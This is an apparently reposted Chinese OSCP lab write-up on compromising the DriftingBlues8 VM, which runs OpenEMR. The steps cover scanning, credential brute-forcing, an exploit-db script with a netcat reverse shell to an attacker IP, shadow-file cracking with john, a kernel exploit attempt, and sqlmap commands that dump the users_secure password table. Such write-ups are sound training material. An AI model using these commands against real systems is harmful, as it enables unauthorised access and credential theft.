【OSCP】driftingblues8

OSCP 靶场

靶场介绍

信息收集

主机发现

fping -aqg 192.168.1.0/24

端口扫描

└─# nmap -sV -A -p- -T4 192.168.1.191
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-26 21:25 EST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 192.168.1.191
Host is up (0.0011s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:2D:64:D7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.08 ms 192.168.1.191

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.191 -x php,txt,html

扫描到一个有用的字典文件，接下来的思路就是爆破后台了

爆破到了账号密码，尝试登录成功。

权限获取

根据cms 版本找到了不少漏洞

python2 /usr/share/exploitdb/exploits/php/webapps/45161.py http://192.168.1.191 -u admin -p .:.yarrak.:.31 -c "nc 192.168.1.158 8989 -e /bin/bash"

权限提升

这里使用linpeas 提权脚本找到了如下一些有用的信息，其中有一个shadow备份文件

/var/www/html/sites/default/sqlconf.php
/var/backups/shadow.backup 
-rw-r--r-- 1 root root 943 Apr 25  2021 /var/backups/shadow.backup                                                                                      
-rwxrwxrwx 1 www-data www-data 2179 May 28  2018 /var/www/html/interface/main/backuplog.php
-rwxrwxrwx 1 www-data www-data 27999 May 28  2018 /var/www/html/interface/main/backup.php
-rwxrwxrwx 1 www-data www-data 1992 May 28  2018 /var/www/html/interface/main/backuplog.sh
-rwxrwxrwx 1 www-data www-data 1117 May 28  2018 /var/www/html/contrib/util/backup_oemr.sh
-rw-r--r-- 1 root root 303 Oct 26  2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 363752 Apr 30  2018 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 348 Nov 25  2020 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz
-rw-r--r-- 1 root root 2754 Jun 21  2019 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 6199 Mar 19  2021 /usr/lib/modules/4.19.0-16-686-pae/kernel/drivers/net/team/team_mode_activebackup.ko
-rwxr-xr-x 1 root root 38412 Nov 25  2020 /usr/bin/wsrep_sst_mariabackup
passwd file: /etc/pam.d/passwd                                                                                                                          
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
/var/www/html/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA.php

/var/www/html/vendor/doctrine/couchdb

shadow 爆破

尝试使用john 进行爆破，成功获取clapton 账号的密码

john -w=/usr/share/wordlists/rockyou.txt shadow --format=crypt

root 提权

这里有个root 权限的文件，还骂人过分了。silly hacker! 但是这个文件并没有什么用。

使用exp 提权失败

clapton@driftingblues:/tmp$ gcc -c exp.c 
clapton@driftingblues:/tmp$ gcc -o exp exp.o -lm
clapton@driftingblues:/tmp$ ls
exp  exp.c  exp.o  linpeas.sh
clapton@driftingblues:/tmp$ chmod +x exp
clapton@driftingblues:/tmp$ ./exp 
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[-] unshare(CLONE_NEWUSER): Operation not permitted

到这里才发现clapton用户下的wordlist.txt 和网站目录下载的wordlist.txt 不是同一个。所以还是不够细致啊！

接下来就可以拿这个字典再次爆破了。经过尝试还真的有 root 的账号密码

补充

这里还有另外一个

sqlmap -u 'http://192.168.1.191/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' -p enc -b --random-agent --batch

# sqlmap -u 'http://192.168.1.191/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' -p enc -b --random-agent --batch -D openemr -T users_secure -C username,password --dump

原文始发于微信公众号（贝雷帽SEC）：【OSCP】driftingblues8